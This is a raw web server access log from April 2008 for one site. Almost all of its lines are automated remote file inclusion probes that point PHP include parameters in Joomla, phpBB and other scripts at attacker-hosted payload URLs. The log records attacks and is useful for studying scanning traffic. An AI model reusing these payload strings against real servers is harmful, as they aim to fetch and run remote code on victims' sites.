212.85.12.121 - - [01/Apr/2008:05:57:58 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
89.159.200.63 - - [01/Apr/2008:05:58:54 -0700] "GET /logs/access.log HTTP/1.1" 206 10 "-" "libwww-perl/5.805" "bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:06:00:08 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:06:00:09 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:06:01:04 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:06:01:04 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:06:01:04 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [01/Apr/2008:06:01:05 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:01:12 -0700] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:01:12 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
213.195.77.225 - - [01/Apr/2008:06:01:39 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.195.77.225 - - [01/Apr/2008:06:01:39 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:06:02:20 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:06:02:20 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
213.254.214.3 - - [01/Apr/2008:06:04:24 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.254.214.3 - - [01/Apr/2008:06:04:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.254.214.3 - - [01/Apr/2008:06:04:31 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.216.209.45 - - [01/Apr/2008:06:04:31 -0700] "GET /logs/?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 200 2940 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
209.216.209.45 - - [01/Apr/2008:06:04:32 -0700] "GET /?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 200 1180 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:06:04:34 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:06:04:35 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:06:06:33 -0700] "GET /logs/index.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:06:06:33 -0700] "GET /index.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:08:33 -0700] "GET //index.php?skin_file=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:08:33 -0700] "GET /logs//index.php?skin_file=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:08:45 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:09:59 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
81.198.83.196 - - [01/Apr/2008:06:10:10 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/h4_dy/lek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
81.198.83.196 - - [01/Apr/2008:06:10:11 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/h4_dy/lek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.195.77.225 - - [01/Apr/2008:06:10:35 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:10:36 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:10:45 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:12:27 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:12:28 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:12:28 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:12:28 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:12:28 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:12:28 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.195.77.225 - - [01/Apr/2008:06:12:30 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.195.77.225 - - [01/Apr/2008:06:12:30 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:06:13:52 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:06:13:53 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:06:13:53 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:13:59 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:13:59 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:13:59 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
118.127.2.108 - - [01/Apr/2008:06:14:00 -0700] "GET /bughttp://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
118.127.2.108 - - [01/Apr/2008:06:14:01 -0700] "GET /logs/bughttp://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:06:14:08 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:06:14:08 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:06:14:08 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
68.149.224.227 - - [01/Apr/2008:06:14:24 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
68.149.224.227 - - [01/Apr/2008:06:14:24 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
118.127.2.108 - - [01/Apr/2008:06:14:30 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
118.127.2.108 - - [01/Apr/2008:06:14:30 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:14:39 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:14:46 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:14:46 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:14:46 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:15:13 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:15:13 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:15:14 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
195.14.47.251 - - [01/Apr/2008:06:15:50 -0700] "GET /logs/?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 200 2940 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
195.14.47.251 - - [01/Apr/2008:06:15:51 -0700] "GET /?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 200 1180 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:16:26 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:06:17:19 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:06:17:19 -0700] "GET //config/dbutil.bck.php?confdir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:06:17:19 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:06:17:37 -0700] "GET /logs/access_071231.log//index.php?sourcedir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:06:17:37 -0700] "GET //index.php?sourcedir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:06:17:37 -0700] "GET /logs//index.php?sourcedir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:17:47 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:06:17:59 -0700] "GET /logs/access_080101.log//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [01/Apr/2008:06:18:14 -0700] "GET /logs/access_071231.log//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:18:30 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
210.118.170.87 - - [01/Apr/2008:06:18:34 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:18:56 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:18:56 -0700] "GET //config/dbutil.bck.php?confdir=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:18:56 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:19:00 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:19:00 -0700] "GET //config/dbutil.bck.php?confdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:19:00 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:19:09 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:19:09 -0700] "GET //config/dbutil.bck.php?confdir=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:19:10 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:19:10 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:19:22 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:06:20:55 -0700] "GET /logs/access_080101.log//claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:06:20:55 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:06:20:55 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.55.208.100 - - [01/Apr/2008:06:21:18 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.bsfadvisors.com"
152.74.96.144 - - [01/Apr/2008:06:21:22 -0700] "GET /logs/access_080101.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
152.74.96.144 - - [01/Apr/2008:06:21:22 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
152.74.96.144 - - [01/Apr/2008:06:21:23 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:06:21:48 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:06:21:48 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:06:21:49 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:23:15 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:23:15 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:23:16 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:23:26 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:23:27 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.8.66 - - [01/Apr/2008:06:23:27 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:25:06 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:25:06 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:25:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:25:08 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:25:08 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:06:25:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:25:26 -0700] "GET //atom.php5?page=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:06:25:26 -0700] "GET /logs//atom.php5?page=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:25:46 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:25:46 -0700] "GET //config/dbutil.bck.php?confdir=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [01/Apr/2008:06:25:46 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
